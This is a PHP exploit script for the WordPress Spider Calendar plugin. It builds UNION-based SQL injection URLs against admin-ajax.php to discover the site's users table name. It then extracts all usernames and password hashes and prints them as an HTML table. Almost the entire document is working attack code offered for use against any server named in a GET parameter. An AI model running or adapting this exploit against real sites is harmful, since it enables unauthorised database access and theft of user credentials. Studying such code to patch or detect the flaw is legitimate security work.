WordPress Spider Calendar Exploit

1. <?php
2.  
3. /*
4.  This program is free software: you can redistribute it and/or modify
5.     it under the terms of the GNU General Public License as published by
6.     the Free Software Foundation, either version 3 of the License, or
7.     (at your option) any later version.
8.  
9.     This program is distributed in the hope that it will be useful,
10.     but WITHOUT ANY WARRANTY; without even the implied warranty of
11.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12.     GNU General Public License for more details.
13.  
14.     You should have received a copy of the GNU General Public License
15.     along with this program.  If not, see <http://www.gnu.org/licenses/>.
16.  
17.     Author: Mateusz Sławomir Lach
18.  */
19.  
20. define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
21.  
22. define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
23.  
24. define('FAKE_ID_TO_SEARCH', 12345677654321);
25. define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
26. define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
27. define('ROW_SEPARATOR', ',');
28. define('FIELD_SEPARATOR', '##');
29. $server = $_GET['SRV'];
30. if (empty($server))
31. {
32.     echo 'Please put server name in SRV GET variable!';
33. }
34. else
35. {
36.     $fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
37.     $prefixCurl = curl_init($fullURL);
38.     curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
39.     $result = curl_exec($prefixCurl);
40.     if (stripos($result, PATTERN_TO_SEARCH) !== false)
41.     {
42.         preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
43.         $tableName = str_replace('####', '', $tableNames[0]);
44.         echo 'tableName: '.$tableName.'<BR/>';
45.         $fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
46.         $usersCurl = curl_init($fullURL);
47.         curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
48.         $result = curl_exec($usersCurl);  
49.         if (stripos($result, PATTERN_TO_SEARCH) !== false)
50.         {
51.             $from = stripos($result, PATTERN_TO_SEARCH_USERS);
52.             $to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
53.             $result = substr($result, $from, $to-$from);
54.             echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
55.         }
56.         else
57.         {
58.             echo 'Table name fetched, but not users - try to rewrite exploit :-(';
59.         }
60.     }
61.     else
62.     {
63.         echo 'NOT vulnerable :-(';
64.     }
65. }